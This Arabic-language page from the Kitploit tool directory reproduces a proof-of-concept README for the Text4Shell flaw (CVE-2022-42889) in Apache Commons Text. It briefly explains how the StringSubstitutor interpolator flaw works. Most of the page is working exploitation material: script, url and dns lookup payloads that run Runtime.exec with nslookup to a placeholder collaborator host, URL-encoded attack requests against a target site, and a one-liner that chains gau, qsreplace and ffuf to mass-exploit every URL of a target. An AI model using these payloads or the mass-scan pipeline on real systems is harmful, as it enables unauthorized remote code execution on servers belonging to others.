Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-42889-text4shell — Apache commons text - CVE-2022-42889 Text4Shell استغلال إثبات المفهوم. | Kitploit
أدوات/GitHubGitHub/kljunowsky/cve-2022-42889-text4shell
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubkljunowsky/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

Apache commons text - CVE-2022-42889 Text4Shell استغلال إثبات المفهوم.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
578منذ 2 سنواتتمت المراجعة من قبل Kitploit

CVE-2022-42889-text4shell 🔥🔥🔥

Apache commons text - CVE-2022-42889 Text4Shell إثبات مفهوم الاستغلال.

تفاصيل📃

يؤثر CVE-2022-42889 على إصدارات Apache Commons Text من 1.5 إلى 1.9. تم إصلاحه في الإصدار 1.10 من Commons Text.

تمت مقارنة الثغرة الأمنية بـ Log4Shell حيث أنها ثغرة على مستوى مكتبة مفتوحة المصدر من المحتمل أن تؤثر على مجموعة واسعة من تطبيقات البرمجيات التي تستخدم الكائن ذا الصلة. ومع ذلك، يشير التحليل الأولي إلى أن هذه مقارنة سيئة. طبيعة الثغرة تعني أنه على عكس Log4Shell، سيكون من النادر أن يستخدم التطبيق المكون المعرض للخطر من Commons Text لمعالجة مدخلات غير موثوقة وربما ضارة.

التحليل الفني

توجد الثغرة في كائن interpolator الخاص بـ StringSubstitutor. يتم إنشاء interpolator بواسطة طريقة StringSubstitutor.createInterpolator() وسيسمح بعمليات بحث عن السلاسل كما هو محدد في StringLookupFactory. يمكن استخدام ذلك بتمرير سلسلة بالصيغة "${prefix:name}" حيث prefix هو البحث المذكور سابقًا. استخدام عمليات البحث "script" أو "dns" أو "url" سيسمح لسلسلة مصممة بتنفيذ نصوص برمجية عشوائية عند تمريرها إلى كائن interpolator.

بينما من غير المحتمل وجود مقطع الكود هذا تحديدًا في التطبيقات الإنتاجية، فإن القلق هو أنه في بعض التطبيقات، قد يكون المتغير pocstring تحت سيطرة المهاجم. بهذا المعنى، تشبه الثغرة Log4Shell. ومع ذلك، فإن interpolator الخاص بـ StringSubstitutor أقل استخدامًا بشكل ملحوظ من استبدال السلاسل المعرض للخطر في Log4j، وطبيعة مثل هذا interpolator تعني أن الوصول بمدخلات مصممة إلى الكائن المعرض للخطر أقل احتمالًا من مجرد التفاعل مع سلسلة مصممة كما في Log4Shell.

الاستغلال👨‍💻

يدوي🛠️

script:javascript

استبدل قيمة المعامل بالحمولة:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

url

root@kitploit:~
${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Burl%3AUTF-8%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

dns

root@kitploit:~
${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Bdns%3Aaddress%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

الاستغلال الجماعي ⛓️

payloads.txt

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
for payload in $(cat payloads.txt|sed 's/ COLLABORATOR-HERE/SPACEid.burpcollaborator.com/g'); do echo TARGET.com | gau --blacklist ttf,woff,svg,png | qsreplace "$payload" | sed 's/SPACE/%20/g' | grep "java.lang.Runtime.getRuntime" >> payloads-final.txt;done && ffuf -w payloads-final.txt -u FUZZ

صيد سعيد!💸

المتطلبات🧰

ffuf شكرًا @joohoi!

qsreplace شكرًا @tomnomnom

gau شكرًا @lc

اتصل بي📇

LinkedIn Twitter - Milan Jovic

LinkedIn - Milan Jovic

تنزيل الأداة